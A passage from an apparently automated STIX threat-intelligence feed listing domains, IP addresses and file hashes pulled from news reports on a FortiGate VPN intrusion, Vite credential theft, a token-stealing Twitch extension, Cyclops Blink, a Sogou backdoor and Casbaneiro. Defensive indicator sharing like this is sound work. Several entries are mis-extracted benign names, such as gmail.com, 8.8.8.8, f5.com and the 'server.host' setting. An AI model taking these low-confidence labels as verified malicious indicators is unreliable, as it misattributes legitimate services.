Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: a FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPN","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80382590-abae-4462-99cf-29094f71f965","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: configuration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--477773e0-3134-4b7e-a8a3-f23d53a9a57c","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: , including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A capture","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24e0cfd3-8a6a-408e-8041-28514ea9e30e","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: f5.com","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: allowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructure","pattern":"[domain-name:value = 'f5.com']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15e10357-76ac-4d8a-9ccd-d9dfd0f2c651","created":"2026-09-14T16:59:19.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: server.host","description":"Seen in \"Hackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials\" (Cyber Security News). Context: se it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingress","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:59:19.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/vite-servers-under-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9155b741-18f8-47be-a991-c0a94164ceb2","created":"2026-09-14T16:15:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: server.host","description":"Seen in \"Hackers target exposed Vite dev servers to steal AWS, Azure secrets\" (BleepingComputer). Context: pose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology comp","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-14T16:15:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-exposed-vite-dev-servers-to-steal-aws-azure-secrets/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91abe943-cecf-44a4-9a1d-d60f1b529b9e","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: alexue4.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: m Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15","pattern":"[domain-name:value = 'alexue4.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc1e38fe-c89f-4854-8a1b-8e5216792eca","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: api.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc","pattern":"[domain-name:value = 'api.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--679e7ab3-71dd-4658-8968-c7608c621e4f","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: 6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; host","pattern":"[domain-name:value = 'drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--46d59a5d-91b7-4586-849e-809b80dc40f3","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: enhanced-1.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;","pattern":"[domain-name:value = 'enhanced-1.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ddca596-53eb-4aa5-affe-6c05bcb89bee","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: enhanced.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1","pattern":"[domain-name:value = 'enhanced.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8a6c53d7-9760-414b-843a-974856f171ad","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ext-03.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain a","pattern":"[domain-name:value = 'ext-03.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9506634-1af9-40e2-b3ba-4ca045d7e9c6","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ext-styles.jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: P address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]","pattern":"[domain-name:value = 'ext-styles.jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3520bac-5874-4f5b-bab9-9969c5cd84cf","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: gmail.com","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: tbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifier","pattern":"[domain-name:value = 'gmail.com']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0fe9402f-0073-4583-af31-3f94ff8bef95","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: img.drisnya.online","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: elper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation Hi","pattern":"[domain-name:value = 'img.drisnya.online']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c85cd326-98b2-4aa5-863c-1681373adeb9","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: jeetbot.cc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.","pattern":"[domain-name:value = 'jeetbot.cc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ecf03fc9-d2db-4223-be61-31b7d48b949e","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO","pattern":"[domain-name:value = 'morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f42eaae-3849-4579-9354-4fa3217ab871","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: proxy.morphilina.me","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: jeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-s","pattern":"[domain-name:value = 'proxy.morphilina.me']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4c4a80e-326d-4aea-9d38-4e0d576d53f7","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: proxy.thebeholder.deno.net","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: up token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endp","pattern":"[domain-name:value = 'proxy.thebeholder.deno.net']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b388a29a-c946-4c65-a74d-98ffb89b0802","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: thebeholderbotapi.vercel.app","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat","pattern":"[domain-name:value = 'thebeholderbotapi.vercel.app']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d9c0446-f443-4290-8a84-eaa76b36fdfc","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: thebeholder-proxy.deno.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi","pattern":"[domain-name:value = 'thebeholder-proxy.deno.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f55f40f9-e3e6-4ae7-bc78-c304ef056537","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ple.com Twitch Enhanced Viewer Firefox Add-ons ID; SHA-256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc Note: IP addresses and domains are intentionally defanged (","pattern":"[file:hashes.'SHA-256' = '141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e44bec6-a531-4ec5-b174-f259cb31cbf3","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed Viewer | JeetBot Chrome Web Store extension ID; SHA-256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8 Firefox extension twitchenhancedviewer@example.com Twitch E","pattern":"[file:hashes.'SHA-256' = 'e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a24316b-77d8-465f-aa2e-ee7d3c4b7882","created":"2026-09-14T13:33:25.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 89.34.96.56","description":"Seen in \"Cyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning\" (Cyber Security News). Context: ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCP","pattern":"[ipv4-addr:value = '89.34.96.56']","pattern_type":"stix","valid_from":"2026-09-14T13:33:25.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/cyclops-blink-evolves/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63f26bd1-2dd9-42ae-b488-4a47bb94e3ee","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: mail.uaiubifas.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25","pattern":"[domain-name:value = 'mail.uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fb94a541-c251-4e3c-a6e7-74a4d4b6b768","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: noht1ng.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02ca5abe-814d-4a3d-bd23-c6df8e0b6077","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 8.218.50.207","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong Domain","pattern":"[ipv4-addr:value = '8.218.50.207']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd4f00fa-bb48-4b97-9abb-b3e23a71cbf7","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: RAYRABBIT command-and-control domain using port 443 SHA-256 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Trojanized DLL loader, originally identified as 7zp.dll wit","pattern":"[file:hashes.'SHA-256' = '29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc061634-c5ef-40ec-9b98-294f42bec4d8","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: ly identified as 7zp.dll with internal name boy.dll SHA-256 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94ed","pattern":"[file:hashes.'SHA-256' = '749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--50ae45d9-f084-4175-a556-24bda9c95dda","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: 98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a GRAYRABBIT backdoor with internal name core.dll File name 7","pattern":"[file:hashes.'SHA-256' = 'd7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d4c48e4-4600-4109-965f-68023d20e8c4","created":"2026-09-14T09:27:43.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 8.8.8.8","description":"Seen in \"Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities\" (GBHackers). Context: entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names,","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-14T09:27:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/cyclops-blink-variant/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--981ff7c9-242f-44f4-aff7-bc1c04427e0e","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 115.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[","pattern":"[domain-name:value = '115.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d43af232-3eeb-4953-9fae-744206aeee66","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 116.181.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.","pattern":"[domain-name:value = '116.181.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62831e7a-32ae-4f4b-832f-2520d64db20f","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b64d60b8-dda3-4c52-8dd8-417918e37d22","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 129.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]","pattern":"[domain-name:value = '129.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc2051ea-5a44-46c8-bef2-95ca63229016","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.","pattern":"[domain-name:value = 